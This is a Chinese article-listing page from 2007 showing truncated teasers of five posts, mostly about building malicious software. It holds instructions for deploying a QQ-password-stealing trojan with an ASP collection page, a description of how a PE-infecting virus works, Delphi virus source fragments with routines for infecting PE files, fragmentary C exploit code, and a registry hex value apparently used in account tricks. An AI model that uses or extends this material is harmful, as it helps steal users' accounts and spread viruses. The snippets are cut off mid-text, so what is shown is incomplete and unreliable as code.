共 5 篇文章 |
|
Application类提供了获取程序运行绝对路径并包括文件名的属性和程序运行绝对路径的文件名属性,竟然不直接提供一个文件名的属性,好奇怪。首先,需要非常了解可执行文件的结构,把原来的可执行文件分解,并且把自身也进行分解,然后重新组合成一个新的可执行文件,但是执行的次序已经改变了,程序开始会先跳转到病毒代码,保证病毒能够被执行后... 阅436 转20 评2 公众公开 07-05-22 16:35 |
用FTP软件将爱永恒,爱保姆qq.asp上传支持ASP脚本的空间,运行alaqq.exe,在"Asp接口地址"中输入爱永恒,爱保姆qq.asp所在的URL地址,那么,当木马截获QQ号码信息后,就会将其保存于爱永恒,爱保姆qq.asp同目录下的qq.txt文件中。如果勾选"运行后关闭QQ",对方一旦运行"啊拉QQ大盗"生成的木马,QQ将会在60秒后自... 阅3147 转510 评4 公众公开 07-05-19 22:11 |
sin.sin_addr.s_addr = 0;sin.sin_port = htons(port);int main(int argc, char **argv, char **env) { struct sockaddr_in sin;printf("[.] using type ‘%s‘\n",targets[type].os); // -------------------- core s=socket(2,1,6); if (connect(s,(struct sockaddr *)&sin,16)!=0) { if (pid) kill(pid,SIGKILL); fatal("... 阅721 转19 评1 公众公开 07-05-19 21:51 |
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }procedure ExtractFile(FileName: string);var.{ 感染PE文件 }procedure InfectOneFile(FileName: string);var.Name <> ‘.‘) and (SearchRec.Name <> ‘..‘) then Result := 0 //不是目录 else if (SearchRec.Attr = 16) and (SearchRec.Name <> ‘.‘) and (SearchRe... 阅876 转18 评0 公众公开 07-05-19 21:50 |
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\00,00,00,00,00,00,00. 阅339 转2 评0 公众公开 07-05-18 14:59 |